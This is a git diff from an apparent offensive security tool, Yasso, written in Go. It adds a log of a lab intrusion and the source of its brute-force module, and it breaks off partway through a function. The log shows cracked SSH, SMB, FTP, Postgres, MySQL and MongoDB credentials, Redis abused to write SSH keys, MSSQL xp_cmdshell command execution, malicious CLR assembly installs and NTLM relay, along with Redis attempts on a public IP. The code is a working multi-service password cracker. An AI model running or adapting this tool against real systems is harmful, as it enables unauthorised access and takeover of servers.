+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 11211 open
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+[+] Memcached 192.168.248.219:11211 unauthorized
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3]
+[+] 200 http://192.168.248.1:8848 [Node.js]  None
+
+[*] Brute Module [ssh]
+
+[*] Have [user:1] [pass:1] [request:1]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:69] [request:345]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:69] [request:345]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:69] [request:345]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:69] [request:345]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:2] [pass:2] [request:4]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+
+[*] brute ssh done
+
+[*] Brute Module [ssh]
+
+[*] Have [user:5] [pass:69] [request:345]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+
+[+] 192.168.248.219 brute ssh success [kali:kali]
+[+] Find 192.168.248.219 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 11211 open
+
+[+] 192.168.248.1 brute smb success [administrator:930517]
+
+[+] 192.168.248.219 brute ftp success [kali:kali]
+
+[+] Mongodb 192.168.248.219 unauthorized
+
+[+] 192.168.248.219 brute mongodb success [admin:123456]
+
+[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
+[+] 192.168.248.219 brute postgres success [admin:admin@123]
+
+[+] 192.168.248.219 brute ssh success [root:kali]
+[+] Memcached 192.168.248.219:11211 unauthorized
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3]
+[+] 200 http://192.168.248.1:8848 [Node.js]  None
+[+] Find 192.168.248.219 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 5432 open
+
[+] 192.168.248.219 brute ftp success [kali:kali]
+
[+] Mongodb 192.168.248.219 unauthorized
+
[+] 192.168.248.219 brute mongodb success [admin:123456]
+
[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+
[+] 192.168.248.219 brute ssh success [root:kali]
+[+] Memcached 192.168.248.219:11211 unauthorized
+
[+] 192.168.248.219 brute postgres success [admin:admin@123]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3]
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.219 27017 open
+[+] 192.168.248.219 5432 open
+[+] 192.168.248.219 11211 open
+[+] 192.168.248.219 21 open
+[+] 192.168.248.219 22 open
+[+] 192.168.248.219 6379 open
+[+] 192.168.248.1 3306 open
+[+] 192.168.248.1 135 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+
[+] Mongodb 192.168.248.219 unauthorized
+
[+] 192.168.248.219 brute mongodb success [admin:123456]
+
[+] 192.168.248.219 brute postgres success [admin:admin@123]
+
[+] 192.168.248.1 brute mysql success [root:root]
+[+] Memcached 192.168.248.219:11211 unauthorized
+
[+] 192.168.248.219 brute ftp success [kali:kali]
+
[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186]
+[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1]
+[+] 200 http://192.168.248.1:8848 [Node.js]  None
+flag needs an argument: --rekey
+Redis Auth failed dial tcp 192.168.248.1:6379: i/o timeout
+Redis Auth failed dial tcp 192.168.248.219:6379: i/o timeout
+Redis Auth failed dial tcp 192.168.248.219:6379: i/o timeout
+Redis Auth failed dial tcp 192.168.248.219:6379: i/o timeout
+
[+] Redis 192.168.248.219:6379 unauthorized
+[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[6105]
+[+] Restore the original dbfilename
+[+] Write ssh key Success
+Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout
+Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout
+Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout
+invalid argument "10" for "--timeout" flag: time: missing unit in duration "10"
+Redis Auth failed dial tcp 118.178.225.48:6379: i/o timeout
+[*] May be your want use redis extend ? Try to add --rekey or --rebound
+flag needs an argument: --rekey
+
[+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[]
+[+] Restore the original dbfilename
+[+] Write ssh key Success
+
[+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[]
+[+] Restore the original dbfilename
+[+] Write ssh key Success
+
[+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[]
+[+] Restore the original dbfilename
+[+] Write ssh key Success
+
[-] Login ssh failed ssh: no key found
+
[-] Login ssh failed ssh: handshake failed: ssh: unable to authenticate, attempted methods [none publickey], no supported methods remain
+
[+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[]
+[+] Restore the original dbfilename
+[+] Write ssh key Success
+[+] Execute Method: xp_cmdshell
+[+] Command: whoami
+nt service\mssqlserver
+
+[+] ALTER DATABASE master SET TRUSTWORTHY ON
+[+] SQLKit ==> WarSQLKit
+[+] Import the assembly
+[+] Link the assembly to a stored procedure
+[+] Install SQLKit successful!
+[+] Please Use SQL Connect Tools to Execute
+[+] WarSQLKit Command Help --kithelp [1,2]
+[+] Execute Method: xp_cmdshell
+[+] Command: whoami
+nt service\mssqlserver
+
+nt service\mssqlserver
+
+
+
+Windows IP 配置
+
+
+以太网适配器 Ethernet0:
+
+   连接特定的 DNS 后缀 . . . . . . . : 
+   本地链接 IPv6 地址. . . . . . . . : fe80::29ae:6020:b5ec:f514%8
+   IPv4 地址 . . . . . . . . . . . . : 192.168.248.128
+   子网掩码  . . . . . . . . . . . . : 255.255.255.0
+   默认网关. . . . . . . . . . . . . : 192.168.248.2
+
+以太网适配器 以太网:
+
+   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
+   连接特定的 DNS 后缀 . . . . . . . : 
+
+以太网适配器 蓝牙网络连接:
+
+   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
+   连接特定的 DNS 后缀 . . . . . . . : 
+
+
+flag needs an argument: --kithelp
+[!] mssql: “whoami”附近有语法错误。
+[!] mssql: “whoami”附近有语法错误。
+[!] mssql: “whoami”附近有语法错误。
+Token Privilege Adjusted
+Starting DCERPC NTLM Relay...
+DCOM Started
+
+
+Token Privilege Adjusted
+Starting DCERPC NTLM Relay...
+DCOM Started
+
+
+[+] SQLKit ==> WarSQLKit
+[+] Uninstall SQLKit successful!
+[+] ALTER DATABASE master SET TRUSTWORTHY ON
+[+] SQLKit ==> SharpSQLKit
+[+] Import the assembly
+[+] Link the assembly to a stored procedure
+[+] Install SQLKit successful!
+[+] Please Use SQL Connect Tools to Execute
+[+] WarSQLKit Command Help --kithelp [1,2]
+[!] mssql: 找不到存储过程 'sp_cmdExec'。
+[+] SQLKit ==> SharpSQLKit
+[+] Uninstall SQLKit successful!
+[+] Execute Method: xp_cmdshell
+[+] Command: whoami
+nt service\mssqlserver
+
+[+] Execute Method: ole echo
+[+] Command: whoami
+nt service\mssqlserver
+
+[+] Execute Method: ole echo
+[+] Command: whoami
+nt service\mssqlserver
+
+Session wait failed Process exited with status 127
+
[-] Login ssh failed ssh: handshake failed: ssh: unable to authenticate, attempted methods [none publickey], no supported methods remain
+
[+] Redis 192.168.248.219:6379 Login Success os:[] path:[] dbfilename:[dump.rdb] pid:[]
+[+] Restore the original dbfilename
+[+] Write ssh key Success
+[+] Execute Method: ole echo
+[+] Command: whoami
+nt service\mssqlserver
+
+[+] Execute Method: ole echo
+[+] Command: ipconfig
+
+Windows IP 配置
+
+
+以太网适配器 Ethernet0:
+
+   连接特定的 DNS 后缀 . . . . . . . : 
+   本地链接 IPv6 地址. . . . . . . . : fe80::29ae:6020:b5ec:f514%8
+   IPv4 地址 . . . . . . . . . . . . : 192.168.248.128
+   子网掩码  . . . . . . . . . . . . : 255.255.255.0
+   默认网关. . . . . . . . . . . . . : 192.168.248.2
+
+以太网适配器 以太网:
+
+   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
+   连接特定的 DNS 后缀 . . . . . . . : 
+
+以太网适配器 蓝牙网络连接:
+
+   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
+   连接特定的 DNS 后缀 . . . . . . . : 
+
+unknown shorthand flag: 'H' in -H
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 445 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+[+] Find 192.168.248.1 (ping)
+[+] Find 127.0.0.1:8080 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 135 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+[+] Find 192.168.248.1 (ping)
+[+] Find 127.0.0.1:8080 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] Find 127.0.0.1:8080 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] Find 192.168.248.1 (ping)
+[+] Find 127.0.0.1:8080 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 445 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+[+] Find 127.0.0.1:8080 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+[+] Find 127.0.0.1:5985 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] Find 127.0.0.1:445 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 135 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+
[+] 127.0.0.1 brute smb success [administrator:930517]
+[+] Find 127.0.0.1:5985 (ping)
+[+] Find 127.0.0.1:445 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 127.0.0.1 5985 open
+[+] 127.0.0.1 445 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 5985 open
+[+] 192.168.248.1 139 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+
[+] 127.0.0.1 brute smb success [administrator:930517]
+[+] Find 127.0.0.1:5985 (ping)
+[+] Find 127.0.0.1:445 (ping)
+[+] Find 192.168.248.1 (ping)
+[+] 192.168.248.1 Find CVE-2020-0796
+[+] 127.0.0.1 5985 open
+[+] 127.0.0.1 445 open
+[+] 192.168.248.1 135 open
+[+] 192.168.248.1 445 open
+[+] 192.168.248.1 139 open
+[+] 192.168.248.1 5985 open
+
[+] 192.168.248.1 brute smb success [administrator:930517]
+
[+] 127.0.0.1 brute smb success [administrator:930517]
\ No newline at end of file
diff --git a/cmd/all.go b/cmd/all.go
index 18e9ee1..7c504b0 100644
--- a/cmd/all.go
+++ b/cmd/all.go
@@ -64,10 +64,10 @@ func allRun(hostString string, portString string, jsonbool bool, runtime int, no
 		fmt.Println("----- [Yasso] Start do ping scan -----")
 		alive = execute(ips, RunICMP)
 	}
-	fmt.Println("[Yasoo get alive host] is", len(alive))
+	fmt.Println("[Yasso get alive host] is", len(alive))
 	// 做漏洞扫描
 	var out []JsonOut
-
+	//TODO:
 	if len(alive) > 0 {
 		fmt.Println("----- [Yasso] Start do vuln scan -----")
 		VulScan(alive, false, true, false) // 做漏洞扫描
diff --git a/cmd/brute.go b/cmd/brute.go
index 629c02e..c40560c 100644
--- a/cmd/brute.go
+++ b/cmd/brute.go
@@ -1,257 +1,257 @@
-package cmd
-
-import (
-	"Yasso/config"
-	"bufio"
-	"fmt"
-	"github.com/panjf2000/ants/v2"
-	"github.com/spf13/cobra"
-	"io"
-	"log"
-	"math"
-	"os"
-	"reflect"
-	"strings"
-	"sync"
-	"time"
-)
-
-// 爆破模块
-
-const (
-	Clearln = "\r\x1b[2K"
-)
-
-var BruteCmd = &cobra.Command{
-	Use:   "crack",
-	Short: "crack module and extend tool",
-	Run: func(cmd *cobra.Command, args []string) {
-		cmd.DisableFlagsInUseLine = true
-		_ = cmd.Help()
-	},
-}
-
-func init() {
-	// 添加全局变量
-	BruteCmd.PersistentFlags().StringVarP(&Hosts, "hosts", "H", "", "to crack hosts address or ips.txt path (crack Must)")
-	BruteCmd.PersistentFlags().IntVar(&BrutePort, "port", 0, "to crack hosts port (if not set use default)")
-	BruteCmd.PersistentFlags().IntVar(&Runtime, "runtime", 100, "set crack thread number")
-	BruteCmd.PersistentFlags().BoolVarP(&BruteFlag, "crack", "", false, "make sure to use crack")
-	BruteCmd.PersistentFlags().DurationVar(&TimeDuration, "timeout", 1*time.Second, "crack module timeout(.eg) 1s (ns,ms,s,m,h)")
-	BruteCmd.PersistentFlags().StringVar(&PassDic, "pd", "", "pass dic path (.eg) pass.txt")
-	BruteCmd.PersistentFlags().StringVar(&UserDic, "ud", "", "user dic path (.eg) user.txt")
-	BruteCmd.PersistentFlags().StringVar(&ProxyHost, "proxy", "", "set socks5 proxy address")
-	BruteCmd.AddCommand(SshCmd)
-	BruteCmd.AddCommand(WinRMCmd)
-	BruteCmd.AddCommand(SmbCmd)
-	BruteCmd.AddCommand(Log4jCmd)
-	BruteCmd.AddCommand(RedisCmd)
-	BruteCmd.AddCommand(RdpCmd)
-	BruteCmd.AddCommand(MysqlCmd)
-	BruteCmd.AddCommand(MssqlCmd)
-	BruteCmd.AddCommand(FtpCmd)
-	BruteCmd.AddCommand(PostgreCmd)
-	BruteCmd.AddCommand(MongoCmd)
-	rootCmd.AddCommand(BruteCmd)
-}
-
-var BurpModule = map[string]interface{}{
-	"ssh":       SshConnByUser,
-	"mysql":     MySQLConn,
-	"mssql":     MssqlConn,
-	"redis":     RedisAuthConn,
-	"unredis":   RedisUnAuthConn, // redis 未授权
-	"postgres":  PostgreConn,
-	"smb":       SmbConn,
-	"ftp":       FtpConn,
-	"rdp":       RdpConn,
-	"winrm":     WinRMAuth,
-	"mongodb":   MongoAuth,
-	"unmongodb": MongoUnAuth, // mongodb 未授权
-}
-
-func BurpCall(EncryptMap map[string]interface{}, name string, params ...interface{}) []reflect.Value {
-	f := reflect.ValueOf(EncryptMap[name]) // 获取map键位name的值
-	if len(params) != f.Type().NumIn() {   // 如果参数的值不等于函数所需要的值
-		log.Println(fmt.Sprintf("[ERROR] Burp Call Func key name %s is failed", name))
-		os.Exit(1)
-	}
-	args := make([]reflect.Value, len(params))
-	for k, param := range params {
-		if param == "" || param == 0 {
-			continue
-		}
-		//Println()(param)
-		args[k] = reflect.ValueOf(param)
-	}
-	//Println()(args)
-	//fmt.Println(args)
-	return f.Call(args) // 调用函数并返回结果
-}
-
-func SwitchBurp(service string, users []string, pass []string, hosts []string, port int, thread int, timeout time.Duration, Domain string) {
-	// 传入的参数均为3个
-	// 调用方式
-	var tunnel = make(chan string, 20)
-	var wg sync.WaitGroup
-	go func() {
-		for _, ip := range hosts {
-			tunnel <- ip
-		}
-	}()
-	for i := 0; i < len(hosts); i++ {
-		wg.Add(1)
-		_ = ants.Submit(func() {
-			ip := <-tunnel
-			burpTask(ip, service, users, pass, port, thread, timeout, Domain, true, false, nil)
-			wg.Done()
-		})
-	}
-	wg.Wait()
-	Println(fmt.Sprintf(Clearln+"[*] brute %s done", service))
-
-	//Println()(service,users,pass,hosts,port,thread,BurpModule)
-}
-
-/***
-* 从新计算爆破方式，之前的爆破是采用分割user进行的，但是发现，user数量会远少于password，所以按照password进行分割
- */
-
-func burpTask(host, service string, users []string, pass []string, port int, thread int, timeout time.Duration, Domain string, run bool, jsonbool bool, out *JsonOut) {
-	var t int
-	var wg sync.WaitGroup
-	if len(pass) <= thread {
-		t = len(pass)
-	} else {
-		// 计算user数量
-		t = thread // 协程数量
-	}
-
-	num := int(math.Ceil(float64(len(pass)) / float64(thread))) // 每个协程的user数量
-	// 分割用户名
-	all := map[int][]string{}
-	for i := 1; i <= t; i++ {
-		for j := 0; j < num; j++ {
-			tmp := (i-1)*num + j
-			if tmp < len(pass) {
-				all[i] = append(all[i], pass[tmp])
-			}
-		}
-	}
-	if run {
-		go func() {
-			for {
-				for _, r := range `-\|/` {
-					fmt.Printf("\r%c brute: wating ... %c", r, r)
-					time.Sleep(200 * time.Millisecond)
-				}
-			}
-		}()
-	}
-	if service == "redis" && run == true {
-		BurpCall(BurpModule, "unredis", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test")
-	}
-	if service == "mongodb" && run == true {
-		BurpCall(BurpModule, "unmongodb", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test")
-	}
-	//Println()(all,num,t)
-	for i := 1; i <= t; i++ {
-		wg.Add(1)
-		tmp := all[i]
-		_ = ants.Submit(func() {
-			for _, p := range tmp {
-				for _, u := range users {
-					if strings.Contains(p, "{user}") {
-						p = strings.ReplaceAll(p, "{user}", p)
-					}
-					if u == "" || p == "" {
-						continue
-					} else {
-						result := BurpCall(BurpModule, service, config.HostIn{Host: host, Port: port, TimeOut: time.Duration(timeout), Domain: Domain}, u, p)
-						burpStatus(result, service, host, Domain, u, p, jsonbool, out)
-					}
-				}
-			}
-			wg.Done()
-		})
-	}
-	wg.Wait()
-}
-
-func burpStatus(result []reflect.Value, service, host, domain, user, pass string, jsonbool bool, out *JsonOut) {
-	var lock sync.Mutex
-	// 这里是判断类型并返回结果的函数
-	if len(result) > 0 {
-		for _, v := range result {
-			switch v.Kind() {
-			case reflect.Bool:
-				if v.Bool() == true {
-					if domain != "" {
-						domain = domain + "\\"
-					}
-					if jsonbool == true {
-						// 加锁
-						lock.Lock()
-						out.WeakPass = append(out.WeakPass, map[string]map[string]string{service: {user: pass}})
-						lock.Unlock()
-					}
-					Println(fmt.Sprintf(Clearln+`[+] %s brute %s success [%v%s:%s]`, host, service, domain, user, pass))
-				}
-			}
-		}
-	}
-}
-
-func Readiness(file *os.File) []string {
-	var readiness []string       /*定义一个空切片用于存储遍历后的数据*/
-	buf := bufio.NewReader(file) /*建立一个缓冲区，将文本内容写入缓冲区*/
-	for {
-		data, errR := buf.ReadBytes('\n') /*读取到\n截至*/
-		if errR != nil {
-			if errR == io.EOF {
-				break
-			}
-			return readiness
-		}
-		str := strings.TrimSpace(string(data))
-		// 修复读取时出现空的导致抛出panic
-		if str == "" {
-			continue
-		}
-
-		readiness = append(readiness, str) /*将去除换行符的字符串写入切片*/
-	}
-	return readiness
-}
-
-func ReadTextToDic(service, user, pass string) ([]string, []string) {
-	var (
-		userdic = config.Userdict[service]
-		passdic = config.Passwords
-	)
-	// 入过不包含.txt的话，按照用户名和密码来算。其中
-	if user != "" && !strings.Contains(user, ".txt") {
-		userdic = strings.Split(user, ",")
-	}
-	if pass != "" && !strings.Contains(pass, ".txt") {
-		passdic = strings.Split(pass, ",")
-	}
-
-	if user != "" && strings.Contains(user, ".txt") {
-		userive, err := os.Open(user)
-		if err != nil {
-			Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your user dic path", UserDic))
-			return []string{}, []string{}
-		}
-		userdic = Readiness(userive)
-	}
-	if pass != "" && strings.Contains(pass, ".txt") {
-		passive, err := os.Open(pass)
-		if err != nil {
-			Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your pass dic path", PassDic))
-			return []string{}, []string{}
-		}
-		passdic = Readiness(passive)
-	}
-	return userdic, passdic
-}
+package cmd
+
+import (
+	"Yasso/config"
+	"bufio"
+	"fmt"
+	"github.com/panjf2000/ants/v2"
+	"github.com/spf13/cobra"
+	"io"
+	"log"
+	"math"
+	"os"
+	"reflect"
+	"strings"
+	"sync"
+	"time"
+)
+
+// 爆破模块
+
+const (
+	Clearln = "\r\x1b[2K"
+)
+
+var BruteCmd = &cobra.Command{
+	Use:   "crack",
+	Short: "crack module and extend tool",
+	Run: func(cmd *cobra.Command, args []string) {
+		cmd.DisableFlagsInUseLine = true
+		_ = cmd.Help()
+	},
+}
+
+func init() {
+	// 添加全局变量
+	BruteCmd.PersistentFlags().StringVarP(&Hosts, "hosts", "H", "", "to crack hosts address or ips.txt path (crack Must)")
+	BruteCmd.PersistentFlags().IntVar(&BrutePort, "port", 0, "to crack hosts port (if not set use default)")
+	BruteCmd.PersistentFlags().IntVar(&Runtime, "runtime", 100, "set crack thread number")
+	BruteCmd.PersistentFlags().BoolVarP(&BruteFlag, "crack", "", false, "make sure to use crack")
+	BruteCmd.PersistentFlags().DurationVar(&TimeDuration, "timeout", 1*time.Second, "crack module timeout(.eg) 1s (ns,ms,s,m,h)")
+	BruteCmd.PersistentFlags().StringVar(&PassDic, "pd", "", "pass dic path (.eg) pass.txt")
+	BruteCmd.PersistentFlags().StringVar(&UserDic, "ud", "", "user dic path (.eg) user.txt")
+	BruteCmd.PersistentFlags().StringVar(&ProxyHost, "proxy", "", "set socks5 proxy address")
+	BruteCmd.AddCommand(SshCmd)
+	BruteCmd.AddCommand(WinRMCmd)
+	BruteCmd.AddCommand(SmbCmd)
+	BruteCmd.AddCommand(Log4jCmd)
+	BruteCmd.AddCommand(RedisCmd)
+	BruteCmd.AddCommand(RdpCmd)
+	BruteCmd.AddCommand(MysqlCmd)
+	BruteCmd.AddCommand(MssqlCmd)
+	BruteCmd.AddCommand(FtpCmd)
+	BruteCmd.AddCommand(PostgreCmd)
+	BruteCmd.AddCommand(MongoCmd)
+	rootCmd.AddCommand(BruteCmd)
+}
+
+var BurpModule = map[string]interface{}{
+	"ssh":       SshConnByUser,
+	"mysql":     MySQLConn,
+	"mssql":     MssqlConn,
+	"redis":     RedisAuthConn,
+	"unredis":   RedisUnAuthConn, // redis 未授权
+	"postgres":  PostgreConn,
+	"smb":       SmbConn,
+	"ftp":       FtpConn,
+	"rdp":       RdpConn,
+	"winrm":     WinRMAuth,
+	"mongodb":   MongoAuth,
+	"unmongodb": MongoUnAuth, // mongodb 未授权
+}
+
+func BurpCall(EncryptMap map[string]interface{}, name string, params ...interface{}) []reflect.Value {
+	f := reflect.ValueOf(EncryptMap[name]) // 获取map键位name的值
+	if len(params) != f.Type().NumIn() {   // 如果参数的值不等于函数所需要的值
+		log.Println(fmt.Sprintf("[ERROR] Burp Call Func key name %s is failed", name))
+		os.Exit(1)
+	}
+	args := make([]reflect.Value, len(params))
+	for k, param := range params {
+		if param == "" || param == 0 {
+			continue
+		}
+		//Println()(param)
+		args[k] = reflect.ValueOf(param)
+	}
+	//Println()(args)
+	//fmt.Println(args)
+	return f.Call(args) // 调用函数并返回结果
+}
+
+func SwitchBurp(service string, users []string, pass []string, hosts []string, port int, thread int, timeout time.Duration, Domain string) {
+	// 传入的参数均为3个
+	// 调用方式
+	var tunnel = make(chan string, 20)
+	var wg sync.WaitGroup
+	go func() {
+		for _, ip := range hosts {
+			tunnel <- ip
+		}
+	}()
+	for i := 0; i < len(hosts); i++ {
+		wg.Add(1)
+		_ = ants.Submit(func() {
+			ip := <-tunnel
+			burpTask(ip, service, users, pass, port, thread, timeout, Domain, true, false, nil)
+			wg.Done()
+		})
+	}
+	wg.Wait()
+	Println(fmt.Sprintf(Clearln+"[*] brute %s done", service))
+
+	//Println()(service,users,pass,hosts,port,thread,BurpModule)
+}
+
+/***
+* 从新计算爆破方式，之前的爆破是采用分割user进行的，但是发现，user数量会远少于password，所以按照password进行分割
+ */
+
+func burpTask(host, service string, users []string, pass []string, port int, thread int, timeout time.Duration, Domain string, run bool, jsonbool bool, out *JsonOut) {
+	var t int
+	var wg sync.WaitGroup
+	if len(pass) <= thread {
+		t = len(pass)
+	} else {
+		// 计算user数量
+		t = thread // 协程数量
+	}
+
+	num := int(math.Ceil(float64(len(pass)) / float64(thread))) // 每个协程的user数量
+	// 分割用户名
+	all := map[int][]string{}
+	for i := 1; i <= t; i++ {
+		for j := 0; j < num; j++ {
+			tmp := (i-1)*num + j
+			if tmp < len(pass) {
+				all[i] = append(all[i], pass[tmp])
+			}
+		}
+	}
+	if run {
+		go func() {
+			for {
+				for _, r := range `-\|/` {
+					fmt.Printf("\r%c brute: wating ... %c", r, r)
+					time.Sleep(200 * time.Millisecond)
+				}
+			}
+		}()
+	}
+	if service == "redis" && run == true {
+		BurpCall(BurpModule, "unredis", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test")
+	}
+	if service == "mongodb" && run == true {
+		BurpCall(BurpModule, "unmongodb", config.HostIn{Host: host, Port: BrutePort, TimeOut: TimeDuration}, "test", "test")
+	}
+	//Println()(all,num,t)
+	for i := 1; i <= t; i++ {
+		wg.Add(1)
+		tmp := all[i]
+		_ = ants.Submit(func() {
+			for _, p := range tmp {
+				for _, u := range users {
+					if strings.Contains(p, "{user}") {
+						p = strings.ReplaceAll(p, "{user}", p)
+					}
+					if u == "" || p == "" {
+						continue
+					} else {
+						result := BurpCall(BurpModule, service, config.HostIn{Host: host, Port: port, TimeOut: time.Duration(timeout), Domain: Domain}, u, p)
+						burpStatus(result, service, host, Domain, u, p, jsonbool, out)
+					}
+				}
+			}
+			wg.Done()
+		})
+	}
+	wg.Wait()
+}
+
+func burpStatus(result []reflect.Value, service, host, domain, user, pass string, jsonbool bool, out *JsonOut) {
+	var lock sync.Mutex
+	// 这里是判断类型并返回结果的函数
+	if len(result) > 0 {
+		for _, v := range result {
+			switch v.Kind() {
+			case reflect.Bool:
+				if v.Bool() == true {
+					if domain != "" {
+						domain = domain + "\\"
+					}
+					if jsonbool == true {
+						// 加锁
+						lock.Lock()
+						out.WeakPass = append(out.WeakPass, map[string]map[string]string{service: {user: pass}})
+						lock.Unlock()
+					}
+					Println(fmt.Sprintf(Clearln+`[+] %s brute %s success [%v%s:%s]`, host, service, domain, user, pass))
+				}
+			}
+		}
+	}
+}
+
+func Readiness(file *os.File) []string {
+	var readiness []string       /*定义一个空切片用于存储遍历后的数据*/
+	buf := bufio.NewReader(file) /*建立一个缓冲区，将文本内容写入缓冲区*/
+	for {
+		data, errR := buf.ReadBytes('\n') /*读取到\n截至*/
+		if errR != nil {
+			if errR == io.EOF {
+				break
+			}
+			return readiness
+		}
+		str := strings.TrimSpace(string(data))
+		// 修复读取时出现空的导致抛出panic
+		if str == "" {
+			continue
+		}
+
+		readiness = append(readiness, str) /*将去除换行符的字符串写入切片*/
+	}
+	return readiness
+}
+
+func ReadTextToDic(service, user, pass string) ([]string, []string) {
+	var (
+		userdic = config.Userdict[service]
+		passdic = config.Passwords
+	)
+	// 如果不包含.txt的话，按照用户名和密码来算。其中
+	if user != "" && !strings.Contains(user, ".txt") {
+		userdic = strings.Split(user, ",")
+	}
+	if pass != "" && !strings.Contains(pass, ".txt") {
+		passdic = strings.Split(pass, ",")
+	}
+
+	if user != "" && strings.Contains(user, ".txt") {
+		userive, err := os.Open(user)
+		if err != nil {
+			Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your user dic path", UserDic))
+			return []string{}, []string{}
+		}
+		userdic = Readiness(userive)
+	}
+	if pass != "" && strings.Contains(pass, ".txt") {
+		passive, err := os.Open(pass)
+		if err != nil {
+			Println(fmt.Sprintf(Clearln+"[ERROR] Open %s is failed,please check your pass dic path", PassDic))
+			return []string{}, []string{}
+		}
